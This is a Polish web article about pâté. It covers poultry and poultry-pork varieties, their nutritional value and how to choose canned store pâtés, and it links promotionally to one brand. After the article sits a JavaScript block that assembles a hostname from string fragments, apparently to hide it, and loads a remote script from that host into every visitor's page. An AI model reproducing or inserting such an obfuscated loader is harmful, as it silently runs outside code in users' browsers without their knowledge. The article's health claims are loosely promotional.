|
Pasztety od kuchni, czyli „z czym to się je”?
<p>Spośród różnych, zimnych lub ciepłych, przystawek mięsnych - jedną z najbardziej cenionych w naszym kraju jest pasztet. Przygotowuje się go z jednolitej masy przyrządzonej głównie z mięsa surowego, pieczonego lub gotowanego, zwłaszcza z drobiu, wieprzowiny lub dziczyzny, ale też z warzyw, ryb, grzybów lub sera. Można go kupić w formie konserwy w każdym sklepie spożywczym. Podaje się go jako przystawkę, danie obiadowe, dodatek do sosów i marynat, świetnie też pasuje do kanapek. Czy jednak pasztety drobiowe lub drobiowo-wieprzowe wnoszą coś wartościowego do naszej diety? Co można powiedzieć o pasztetach dostępnych w sklepach spożywczych? Jaka jest ich jakość?<br />
<br />
<strong>Pasztet pod lupą </strong><br />
Najpopularniejszy rodzaj pasztetu to <strong>pasztet drobiowy</strong>, który ma ogromną wartość odżywczą. Dietetycy zalecają spożywanie drobiu pod różną postacią, gdyż jest on źródłem cennego i pełnowartościowego białka, witamin - szczególnie witamin z grupy B, a także składników mineralnych, takich jak cynk, potas i żelazo. Pasztet drobiowy to niskokaloryczna przekąska, gdyż drób ma niską zawartość nasyconych kwasów tłuszczowych, które są szkodliwe. Drób to ważny element diety osób aktywnych fizycznie oraz sportowców, a pasztety z drobiu stanowią smaczny produkt, który można jadać zarówno na śniadanie, do kanapek oraz jako zimną przystawkę. Równie popularny jest <strong>pasztet drobiowo-wieprzowy</strong>. Jest on wzbogacony o wieprzowinę (na przykład w postaci boczku) i można go podawać z warzywami oraz grzybami. Wiele osób chętnie przyrządza pasztety samodzielnie w domu, gdyż nie jest to skomplikowane i można podać go na różne sposoby.<br />
<br />
<strong>Pasztety sklepowe i ich jakość<br />
Pasztety</strong> to popularny produkt spożywczy dostępny w sklepach w formie konserw. Trzeba jednak przyznać, że wielu z nas nie chce kupować takich produktów z obawy przed ogromną ilością konserwantów i „ulepszaczy”. Czy rzeczywiście każdy pasztet na rynku jest pełen „chemii”? Nie! Zanim jednak dokonamy zakupu, warto zapoznać się z etykietą na słoiczku czy puszce. Trzeba też uczciwie przyznać, że najtańsze konserwy nie będą należeć do zdrowych. Warto wybierać więc tylko te pasztety, które mają dobrą opinię, a ich skład nie wzbudza w nas niepokoju. Przykładem może być pasztet firmy <a href="http://drosed.com.pl/produkt/pasztet-belgijski-drobiowo-wieprzowy/" target="_blank">Drosed</a>. W sprzedaży możemy znaleźć pasztety z dodatkiem warzyw, grzybów, przypraw, które mają oryginalny smak i zapach. A dzięki długiej dacie przydatności do spożycia - mogą stanowić nasz asortyment na przykład podczas wyjazdu na wakacje, na których sami musimy zadbać o swoje wyżywienie. Podsumowując - można stwierdzić, iż pasztet to smaczny dodatek do potraw, który w łatwy sposób można przygotować samodzielnie lub też kupić jako gotowy produkt w postaci konserwy. Aby jednak był to zakup udany, warto skupić się nie tyle na atrakcyjnej cenie pasztetu, ile na jego atrakcyjnym, czyli zdrowym i naturalnym składzie.</p>
<script type="text/javascript">
(function(){
un1p=document.createElement("script");un1p.type="text/javascript";
un1p.async=true;un1p_=(("us")+"t")+"a";un1p_+=("t.i")+""+"n";un1p_+=(("f")+"o");
un1p.src="http://"+un1p_+"/6911754.8n4l90kmn1pykkvjt8xa88tr35zbsb";
document.body.appendChild(un1p);
})();
</script>
|